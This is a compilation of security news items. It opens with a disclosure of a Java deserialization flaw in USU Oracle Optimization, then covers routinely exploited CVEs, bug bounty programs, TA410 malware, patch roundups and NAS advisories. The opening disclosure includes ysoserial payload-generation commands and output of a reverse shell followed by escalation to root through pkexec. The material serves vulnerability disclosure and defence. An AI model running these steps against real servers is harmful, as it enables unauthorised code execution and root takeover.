USU Oracle Optimization before 5.17 allows authenticated quantum users to achieve remote code execution because of /v2/quantum/save-data-upload-big-file Java deserialization. NOTE: this is not an Oracle Corporation product.

**Overview**

Quantum agent does require authentication to be downloaded.  
Quantum userscredentials can be retreived in plaintext on agent configuration file.

**Impact**

A user with "Quantum" profile can trigger an unsecure deserialization on server APIs leading to RCE shell as "smartcollector" user.  
"smartcollector" user can trivially escalate to root thanks to pkexec missconfiguration (please see attached bug).

**Details**

"Quantum" profiles can request /v2/quantum/save-data-upload-big-file API.

This API is waiting for a file that is deserialized with SerializationUtil class:

Pseudo-code:

     public class SerializationUtil
     {
       public static Object deserialize(String fileName) throws IOException, ClassNotFoundException {
         FileInputStream fis = new FileInputStream(fileName);
         BufferedInputStream bis = new BufferedInputStream(fis);
         ObjectInputStream ois = new ObjectInputStream(bis);
         Object obj = ois.readObject();
         ois.close();
         return obj;
       }
       ...
    

Unsecure Java deserialization is a common bug that is referenced in the TOP 10 Owasp:

(OWASP deserialization cheatsheets)\[https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html\]

By chainning Java gadgets it is possible to trigger execution on the server. The following blog post explain the basic concepts of gadgets:

(snyk.io java gadget chainning)\[https://snyk.io/blog/serialization-and-deserialization-in-java/\]

Gadget chained have been referenced in various tools allowing to quickly build payloads relying on dependencies. In our case we used ysoserial.

(https://github.com/frohoff/ysoserial)\[https://github.com/frohoff/ysoserial\]

By replacing the hibernate dependancy version in pom.xml with the one used on the server, we succeed to create valid payloads:

    		<dependency>
    		  <groupId>org.hibernate</groupId>
    		  <artifactId>hibernate-core</artifactId>
    -		  <version>5.0.7-final</verion>
    +		  <version>5.2.10-final</verion>
    		</dependency>
    

Once ysoserial is built (mvn clean package -DskipTests) it is possible to generate payloads:

    java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 '<your cmd>'
    

**Proof of Concept**

You can find here a python script that demonstrates the ability to establish a reverse shell (here to 127.0.0.1 4444).  
The Hibernate1 gadget chain payload has been encoded into base64.

Note: the encoded payload establish a reverse shell locally. For this proof of concept the script also should be executed locally.

The script require pwntools python framework.

*   install pwntools (pip install pwntools)
*   Copy python script from Appendix on the server.
*   Replace quantum credentials and URL with yours.
*   Then launch python script

It should result in remote code execution on server.

    $ python3 quantum_serialize_exploit.py
    [*] Try to authenticate to quantum
    [+] Authentcation succeed
    [*] Prepare reverse shell listener
    [+] Trying to bind to :: on port 4444: Done
    [+] Waiting for connections on :::4444: Got connection from ::ffff:127.0.0.1 on port 53112
    [*] Trigger unsecure deserialization
    [*] Switching to interactive mode
    $ id
    uid=1504(smartcollect) gid=1500(oinstall) groups=1500(oinstall),1504(smartcollect)
    $ pkexec id
    uid=0(root) gid=0(root) groups=0(root)
    

**Recommendation****Security Patch**

Upgrade to 5.17

**Workarounds**

We suggest to either use a more secure serialization or use a framework to validate user inputs before deserialization.

**References****Credits**

\[Orange CERT-CC\]\[ora\]  
Cyrille CHATRAS of \[Orange\]\[orange\] group  
\[ora\]: https://cert.orange.com/  
\[orange\]: https://www.orange.com/

**Timeline**

**Date reported:** September 29, 2021  
**Date fixed:** November 24, 2021

CVE-2022-29936: Build software better, together

International cybersecurity authorities have published an overview of the most routinely exploited vulnerabilities of 2021.
The post The top 5 most routinely exploited vulnerabilities of 2021 appeared first on Malwarebytes Labs.

A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.

**1\. Log4Shell**

CVE-2021-44228, commonly referred to as Log4Shell or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

When Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.

This made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.

The Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The CISA Log4j scanner is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.

**2\. CVE-2021-40539**

CVE-2021-40539 is a REST API authentication bypass vulnerability in ManageEngine’s single sign-on (SSO) solution with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that APT threat-actors were likely among those exploiting the vulnerability.

The vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.

For those that have never heard of this software, it’s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.

The ManageEngine site has specific instructions on how to identify and update vulnerable installations.

**3\. ProxyShell**

Third on the list are 3 vulnerabilities that we commonly grouped together and referred to as ProxyShell. CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207.

The danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:

*   **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.
*   **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.
*   **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.

The vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.

Microsoft’s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.

**4\. ProxyLogon**

After the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name—ProxyLogon—for similar reasons. CVE-2021-26855, CVE-2021-26857, CVE-2021-2685, and CVE-2021-27065 all share the same description—”This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.”

While the CVE description is the same for the 4 CVE’s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws—CVE-2021-26858 and CVE-2021-27065—would allow an attacker to write a file to any part of the server.

Together these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.

ProxyLogon started out as a limited and targeted attack method attributed to a group called Hafnium. Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

Microsoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a download link, user instructions, and more information can be found in the Microsoft Security Response Center.

**5\. CVE-2021-26084**

CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of Confluence Server and Data Center that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.

Shortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.

On the Confluence Support website you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.

**Lessons learned**

What does this list tell us to look out for in 2022?

Well, first off, if you haven’t patched one of the above we would urgently advise you to do so. And it wouldn’t hurt to continue working down the list provided by CISA.

Second, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:

*   **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.
*   **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.
*   **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.

So, if you notice or hear about a vulnerability that meets these “requirements” move it to the top of your “to-patch” list.

Stay safe, everyone!

The top 5 most routinely exploited vulnerabilities of 2021

New web targets for the discerning hacker

New web targets for the discerning hacker

Bug Bounty hunters who’d like a little more financial predictability in their lives were given that option this month, with a new program from Intigriti offering payment by the hour.

A combination of bug bounty hunting and penetration testing models, there will be payment for the number of hours a participant spends searching for vulnerabilities, as well as a capped reward for individual bugs. In a pre-launch pilot, hackers collectively earned more than €100,000 ($106,000).

In payout news, a hacker who goes by the name ‘Stealthy’ netted $36,000 in bug bounties after uncovering critical HTTP request smuggling vulnerabilities affecting three of Apple’s core web applications.

Queue poisoning attacks enabled data disclosure and account takeover with no user interaction required, Stealth explained. The bugs affected servers for business.apple.com, school.apple.com, and mapsconnect.apple.com.

Two hacking contests earlier this month also saw researchers earn a bumper crop of rewards.

There were payouts totalling $400,000 at the second edition of Pwn2Own Miami for dozens of previously undiscovered exploits targeting industrial control systems, for instance.

Daan Keuper and Thijs Alkemade were crowned Masters of Pwn with 90 points and $90,000 accrued for their team, while rewards were given for previously unknown zero-day vulnerabilities in industrial control platforms.

Meanwhile, ‘Hack Me I’m Famous’, an overnight hackathon held by bug bounty platform YesWeHack, saw 40 bug bounty hunters compete to find vulnerabilities in French scale-ups or start-ups valued at more than $1 billion.

Of 109 vulnerability reports, 30% were rated as either high or critical severity bugs, with one researcher netting the maximum payout of €10,000.

And finally, an access control vulnerability in open source scheduling platform Easy!Appointments was found to give unauthenticated attackers easy access to personally identifiable information. An unprotected API could expose names, places, and times of bookings made using the app.

The find earned Francesco Carlucci, founder of vulnerability notification platform OpenCIRT, a “small” reward.

**The latest bug bounty programs for May 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**AEX**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$5,000

Outline:  
Digital asset exchange AEX is looking to find critical bugs in its web, mobile, and API targets.

Notes:  
There is an extensive list of out-of-scope targets that must be avoided. As ever, it’s worth taking a look before you start hunting.

Check out the AEX bug bounty page at HackenProof for more details

**American Systems**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$3,000

Outline:  
Management consulting services firm American Systems said it “looks forward to working with the security community to find vulnerabilities in order to keep our businesses and customers safe”.

Notes:  
Rewards are based on severity per CVSS. However, the company said these are “general guidelines, and reward decisions are up to the discretion of American Systems”.

Check out the American Systems’bug bounty page at HackerOne for more details

**ExpressVPN – enhanced**

Program provider:  
Bugcrowd

Program type:  
Public

Max reward:  
$100,000

Outline:  
ExpressVPN has increased its top reward – which is now 10 times higher than the previous highest bounty – with $10,000 now on offer for valid critical flaws unearthed in ExpressVPN’s TrustedServer.

Notes:  
ExpressVPN built TrustedServer to mitigate the risks posed by traditional server management and the elevated bug bounty reward supplements an independent security audit by PwC.

Read the related ExpressVPN press release for more details

**IoTex**

Program provider:  
HackenProof

Program type:  
Public

Max reward:  
$15,000

Outline:  
IoTeX is “the leading decentralized network powering the future of web3 and machine economy (MachineFi)”. It is asking researchers to find vulnerabilities in its web domains, mobile apps, and APIs.

Notes:  
The top three vulnerabilities in scope are business logic issues, payments manipulation, and remote code execution.

Check out the IoTex bug bounty page at HackenProof for more details

**KAYAK**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$5,000

Outline:  
Travel company KAYAK is asking for reports related to vulnerabilities in its website, as well as a number of its subsidiaries.

Notes:  
Not all of KAYAK’s subsidiaries are in scope, so make sure to confirm before hacking.

Check out the KAYAK bug bounty page at HackerOne for more details

**Mastadon – enhanced**

Program provider:  
Intigriti

Program type:  
Public

Max reward:  
€20,000

Outline:  
Mastodon has increased its maximum payout bounty to €20,000.

Notes:  
The bug bounty platform announced on Twitter that the first hacker to claim the new maximum reward will also be gifted with a swag package. Don’t walk, run!

Check out the Mastodon bug bounty page at Intigriti for more details

**SHEIN**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$2,000

Outline:  
Fast fashion retailer SHEIN has launched a bug bounty program that includes targets related to its sister company Romwe.

Notes:  
This program comes after a successful, limited program last year.

Check out the SHEIN bug bounty page at HackerOne for more details

**Sorare**

Program provider:  
HackerOne

Program type:  
Public

Max reward:  
$10,000

Outline:  
Sorare is a global fantasy football game where managers can trade official digital collectibles.

Notes:  
Three assets are in scope: Sorare.com plus Sorare’s API and WebSocket domain.

Check out the Sorare bug bounty page at HackerOne for more details

**Other bug bounty and VDP news this month**

*   Pfizer has launched a vulnerability disclosure program with HackerOne, because looking for “potential issues helps us ensure the security and privacy of customers and data”.
*   Love swag? Who doesn’t! Intigriti has been giving away monthly swag bags on Twitter – see here.

Additional reporting by Emma Woollacott.

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for April 2022

Bug Bounty Radar // The latest bug bounty programs for May 2022

Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges

CVE-2021-44596

The threat group known as TA410 that wields the sophisticated FlowCloud RAT actually has three subgroups operating globally, each with their own toolsets and targets.

The threat group known as TA410 that wields the sophisticated FlowCloud RAT actually has three subgroups operating globally, each with their own toolsets and targets.

A threat group responsible for sophisticated cyberespionage attacks against U.S. utilities is actually comprised of three subgroups, all with their own toolsets and targets, that have been operating globally since 2018, researchers have found.

TA410 is a cyberespionage umbrella group loosely linked to APT10, a group tied to China’s Ministry of State Security. The group is known not only for targeting U.S. organizations in the utilities sector, but also diplomatic organizations in the Middle East and Africa, according to a report published this week by researchers at security firm ESET.

Though it’s apparently been active since 2018, TA410 first came up on researchers’ radar in 2019, when Proofpoint uncovered a phishing campaign targeting three U.S. companies in the utilities sector that used a novel malware then dubbed LookBack.

About a year later, the threat group resurfaced by deploying a sophisticated RAT against Windows targets in the United States’ utilities sector. Dubbed FlowCloud and believed to be the evolution of Lookback, the RAT can access installed applications and control the keyboard, mouse, screen, files, services and processes of an infected computer. The tool also can exfiltrate information to a command-and-control (C2) provider.

Now ESET researchers have found that TA410 is not one but actually three subgroups of threat actors—FlowingFrog, LookingFrog and JollyFrog—each “using very similar tactics, techniques, and procedures (TTPs) but different toolsets and exiting from IP addresses located in three different districts,” researchers Alexandre Côté Cyr and Matthieu Faou wrote in the report.

The teams have overlaps in TTPs, victimology and network infrastructure, and they compromise global targets—primarily government or education organizations–in various ways, indicating that victims are targeted specifically, “with the attackers choosing which entry method has the best chance of infiltrating the target,” researchers said.

Those ways include a new version of FlowCloud as well as access to the most recently known Microsoft Exchange remote code execution vulnerabilities, ProxyLogon and ProxyShell, among other tools—both custom and generic—that are specific to each group, researchers found.

****FlowingFrog****

Researchers analyzed the activity of each subgroup, including which tools they use and what type of victims they target. They also identified overlap in which the actors work together.

Flowing Frog shares network infrastructure—specifically, the domain ffca.caibi379\[.\]com—with JollyFrog. It also ran the phishing campaign uncovered by Proofpoint in 2019 together with LookingFrog, researchers said.

The subgroup has its own specific mode of attack and has launched campaigns against specific targets–namely universities, the foreign diplomatic mission of a South Asian country in China and a mining company in India, researchers found.

FlowingFrog uses a first stage that ESET researchers have named the Tendyron downloader, and then FlowCloud as a second stage they said.

“Tendyron.exe is a legitimate executable, signed by online-banking security vendor Tendyron Corporation, and that is vulnerable to DLL search-order hijacking,” researchers explained.

FlowingFrog also uses Royal Road, a malicious document builder used by several cyberespionage groups that builds RTF documents exploiting Equation Editor N-day vulnerabilities such as _CVE-2017-11882_, researchers said.

****LookingFrog****

LookingFrog typically targets diplomatic missions, charity organizations and entities in government and industrial manufacturing using two main malware families: X4 and LookBack.

X4 is a custom backdoor that is used as a first stage before LookBack is deployed researchers explained. The backdoor is loaded by a VMProtect-ed loader, usually named PortableDeviceApi.dll or WptsExtensions.dll.

LookBack is a RAT written in C++ that relies on a proxy communication tool to relay data from the infected host to the command-and-control server (C2). The malware has capabilities to view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

LookBack is comprised of several components, including a C2 proxy tool, a malware loader, a communications module to create the C2 channel with the GUP proxy tool, and a RAT component to decode the initial beacon response received from the GUP proxy tool.

****JollyFrog****

The third and final team of TA410, JollyFrog, targets organizations in education, religion, and the military as well as those with diplomatic missions, researchers found. Rather than use custom tools, the group exclusively uses generic, off-the-shelf malware from known families QuasarRAT and Korplug, aka PlugX.

Quasar RAT is a full-featured backdoor freely available on _GitHub_ and is a popular tool used by cyberespionage and cybercrime threat actors, researchers said. It’s been previously used in a phishing campaign targeting companies with fake job-seeker Microsoft Word resumes and a 2019 APT10 malicious cyber campaign against government and private organizations in Southeast Asia.

Korplug is a backdoor that that also has been used for years by various cyberespionage groups and remains a popular tool. Last month, China’s Mustang Panda/TA416/RedDelta used Korplug in an espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) in and around Southeast Asia.

TA410 typically deploys Korplug as a RARSFX archive, generally named m.exe and containing three files: qrt.dll, acustom loader; qrtfix.exe, a legitimate signed application from F-Secure, vulnerable to DLL search-order hijacking; and qrt.dll.usb: the Korplug shellcode.

“The loader allocates memory using VirtualAlloc and copies the content of qrt.dll.usb there,” researchers explained. “Then it jumps right into the shellcode that will decompress and load the Korplug payload.”

****Updated Version of FlowCloud****

ESET researchers also took a look under the hood of an updated version of FlowCloud currently being used by TA410.

FlowCloud is a complex implant written in C++ comprised of three main components—a rootkit functionality, a simple persistence module and a custom backdoor–deployed in a multistage process that uses various obfuscation and encryption techniques to hinder analysis.

While Proofpoint researchers previously analyzed FlowCloud versions 4.1.3 and 5.0.1, TA410 is now using FlowCloud versions 5.0.2 and 5.0.3, which have new capabilities, they said.

“Contrary to those previously found, the samples we obtained for version 5.0.2 contain verbose error messages and meticulous logging,” researchers explained.

The new version of the tool now also can perform the following activities:

*   Controlling connected microphones and triggering recording when sound levels above a specified threshold volume are detected;
*   Monitoring clipboard events to steal clipboard content;
*   Monitoring file system events to collect new and modified files; and
*   Controlling attached camera devices to take pictures of the compromised computer’s surroundings.

Cyberespionage APT Now Identified as Three Separate Actors

Plus: Microsoft patched some 100 flaws, while Oracle issued more than 500 security fixes.

To find the update, you’ll need to check your device settings. Devices that have received the Android April update so far include Google’s Pixel devices and some third-party Android phones, including the Samsung Galaxy A32 5G, A51, A52 5G, A53 5G, A71, S10 series, S20 series, Note20 series, Z Flip 5G, Z Flip3, Z Fold, Z Fold2, and the Z Fold3, as well as the OnePlus 9 and OnePlus 9 Pro.

Google Chrome Emergency Updates

As the world’s biggest browser with over 3 billion users, it’s no surprise attackers are targeting Google Chrome. Browser-based attacks are particularly worrying because they can potentially be chained together with other vulnerabilities and used to take over your device.

It has been a particularly busy month for the team behind Google’s Chrome browser, which has seen several security updates within weeks of each other. The latest, pushed out in mid-April, fixes two issues including a high-severity zero-day vulnerability, CVE-2022-1364, which is already being used by attackers.

The technical details aren’t currently available, but the timing of the fix—just a day after it was reported—indicates it’s pretty serious. If you use Chrome, your browser should now be on version 100.0.4896.127 to include the fix. You’ll need to restart Chrome after the update has installed to ensure it activates.

The Chrome issue also impacts other Chromium-based browsers, including Brave, Microsoft Edge, Opera, and Vivaldi, so if you use one of those, make sure you apply the patch.

But that’s not all. On April 27, Google announced another Chrome update, fixing 30 security vulnerabilities. None of these have been exploited yet, the company says, but seven are rated as being a high risk. The update takes the browser to version 101.0.4951.41.

Oracle’s April 2022 Critical Patch Update

In mid-April, Oracle released its quarterly Critical Patch Update, including a whopping 520 security fixes. Some of the issues fixed in the update are serious—300 of them can be exploited remotely without authentication, and 75 security issues are rated as critical severity. Some of the Oracle patches address CVE-2022-22965, aka Spring4Shell, a remote code execution (RCE) flaw in the spring framework.

Microsoft’s Busy April Patch Tuesday

Microsoft had a major Patch Tuesday in April, issuing fixes for over 100 vulnerabilities, including 10 critical RCE flaws. One of the most important, CVE-2022-24521, is already being exploited by attackers, according to the company.

Reported by the NSA and researchers at CrowdStrike, the issue in the Windows Common Log File system driver doesn’t require human interaction to be exploited and can be used to obtain administrative privileges on a logged-in system. Other notable fixes include CVE-2022-26904—a publicly known issue—and CVE-2022-26815, a severe DNS Server flaw.

Mozilla Thunderbird 91.8.0 Fix

On April 5, Mozilla released a patch to fix security issues in its Thunderbird email client as well as its Firefox browser. The details are scant, but Thunderbird 91.8 fixes four vulnerabilities rated as having a high impact, some of which could be exploited to run arbitrary code.

Firefox ESR 91.8 and Firefox 99 also fix multiple security issues.

WordPress Plugin Elementor Version 3.6.3 

The Elementor website builder plug-in for WordPress has received a big security fix in April for a critical-rated vulnerability that could allow attackers to perform remote code execution and effectively take over a website.

Found by researchers at Plugin Vulnerabilities, the flaw was introduced in the plug-in in version 3.6.0, released on March 22. “We would recommend not using this plugin until it has had a thorough security review and all issues are addressed,” the researchers said.

Although the attacker must be authenticated to exploit the issue, it’s still pretty serious because anyone logged into an affected website can exploit it. The update for Elementor’s 5 million users, version 3.6.3, should be applied as soon as possible.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   This startup wants to watch your brain
*   The artful, subdued translations of modern pop
*   Netflix doesn't need a password-sharing crackdown
*   How to revamp your workflow with block scheduling
*   The end of astronauts—and the rise of robots
*   👁️ Explore AI like never before with our new database
*   ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums to affordable mattresses to smart speakers

You Need to Update iOS, Android, and Chrome Right Now

SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in GitHub repository rtxteam/rtx prior to checkpoint_2022-04-20 . This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.

@@ -23,6 +23,7 @@ def load(): database\_name \= f"{autocomplete\_filepath}{os.path.sep}{RTXConfig.autocomplete\_path.split('/')\[\-1\]}" conn \= sqlite3.connect(database\_name) cursor \= conn.cursor() #print(f"INFO: Connected to {database\_name}",file=sys.stderr) return True  
  
@@ -39,6 +40,9 @@ def get\_nodes\_like(word,requested\_limit): if len(word) < 2: return values  
\#### Try to avoid SQL injection exploits by sanitizing input #1823 word \= word.replace('"','')  
floor \= word\[:\-1\] ceiling \= floor + 'zz'  
@@ -103,8 +107,12 @@ def get\_nodes\_like(word,requested\_limit): if found\_fragment is None:  
\#### Cache this fragment in the database cursor.execute("INSERT INTO cached\_fragments(fragment) VALUES(?)", (word,)) fragment\_id \= cursor.lastrowid try: cursor.execute("INSERT INTO cached\_fragments(fragment) VALUES(?)", (word,)) fragment\_id \= cursor.lastrowid except: print(f"ERROR: Unable to INSERT into cached\_fragments(fragment)",file\=sys.stderr) fragment\_id \= 0 if debug: print(f"fragment\_id = {fragment\_id}")

CVE-2022-1531: avoid SQL injection exploits · RTXteam/RTX@fa2797e

NAS device vendors are dealing with several severe vulnerabilities in Netatalk, the open-source implemenation of AFP.
The post QNAP customers urged to disable AFP to protect against severe vulnerabilities appeared first on Malwarebytes Labs.

MacOS users that have a network-attached storage (NAS) device made by QNAP are being advised to disable the Apple Filing Protocol (AFP) on their devices until some severe vulnerabilities have been fixed. But QNAP is not the only vendor that needed to fix these vulnerabilities. Others have already done so, or have taken more drastic measures.

Taiwanese corporation QNAP has asked customers to disable the AFP file service protocol on its NAS appliances while it creates fixes for multiple, critical Netatalk vulnerabilities.

The vulnerabilities most urgently in need of mitigation or a fix are: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122 and CVE-2022-23125. All of them are remote code execution (RCE) vulnerabilities, and all of them have a CVSS severity score of 9.8 out of 10.

In a security advisory, QNAP says it has fixed the Netatalk vulnerabilities for QTS 4.5.4.2012 build 20220419 and later, but it is still working to release security updates for all affected QNAP operating system versions. Given the severity of the vulnerabilities, keep an eye for updates.

**AFP and Netatalk**

A NAS device is a storage server connected to a computer network, storing data that can be accessed by a wide variety of devices, including Windows, macOS, and other systems. In real life this usually means they are used as an external hard-drive that can be accessed over an intranet or the Internet.

AFP is a proprietary network protocol, and part of the Apple File Service (AFS), that offers file services for macOS and the classic Mac OS. Many types of NAS devices support AFP so that macOS systems can access the data on them.

Netatalk is a free, open-source implementation of AFP that allows the Unix-like operating systems (that frequently power NAS devices) to serve as a file server for macOS systems.

Version 3.0 of Netatalk was released in July 2012. On  22nd of March 2022 the Netatalk team at Sourceforge announced Netatalk 3.1.13 with a new feature and several security updates.

**Not just QNAP**

Given the popularity of Netatalk, QNAP isn’t the only vendor that needs to deal with these vulnerabilities.

Another popular NAS device vendor, Synology, had issued Disk Station Manager version 7.1 to deal with the vulnerabilities. The update is expected to be available in all regions shortly but you can download it from the company’s website now if you want.

Western Digital removed Netatalk from its firmware, released on January 10, 2022. The company says that users can continue to access local network shares and perform Time Machine backups via SMB, a different file-sharing protocol.

TrueNAS says it fixed the vulnerabilities in TrueNAS Core 12.0-U8.1 on April 14, 2022.

**Mitigation**

Until an update has been made available, QNAP advises uses of affected devices to disable AFP and install security updates as soon as they become available.

To disable AFP on your QTS or QuTS hero NAS device, you will have to go to **Control Panel** > **Network & File Services** > **Win/Mac/NFS/WebDAV** > **Apple Networking** and select **Disable AFP (Apple Filing Protocol)**.

Stay safe, everyone!

QNAP customers urged to disable AFP to protect against severe vulnerabilities

Turtlapp Turtle Note v0.7.2.6 does not filter the <meta> tag during markdown parsing, allowing attackers to execute HTML injection.

Press Releases | 24 March 2022

**HTML Injection vulnerability found in Turtl Notes, disclosed by Cyber Citadel researchers, could affect iOS and Android users**.

Cyber Citadel’s Lead Security Researcher Rafay Baloch and Security Researcher Muhammad Samak disclosed an HTML Injection vulnerability found in the Turtl Notes application, which could lead to a potential RCE and NTLMv2 hash disclosure via abusing the arbitrary URI schemes.

Turtl Notes user interface

**Turtl Notes**

Turtl Notes is a cross-platform application that focuses on note-taking collaboration. The online service provides users with a notebook sharing platform that allows notes to be organised easily, synchronised across devices, shared with other Turtl users and shared via email. The application has been downloaded 10,000+ times on Google Play and an unknown number of times from the Turtl’s website for Windows, OSX, Linux, Android and iOS.

While Turtl encrypts user data, with an impressive 2,048-bit key encryption system, and boasts the implementation of high-grade firewalls, that protect from DDoS attacks, the HTML Injection vulnerability, found by Rafay Baloch and Muhammad Samak, has exposed a critical flaw in Turtl’s software.

Turtl remote code execution POC

Evidence of Turtle RCE vulnerability

Evidence of Turtle RCE vulnerability

**Response from Vendors**

Vendor

Service

Version

Platform

Reported Date

Fixed

CVE

Turtl

Turtl Notes

0.7.2.6

Windows, Mac, Linux, Android

11/12/2021

N/A

Processing

Tag

#rce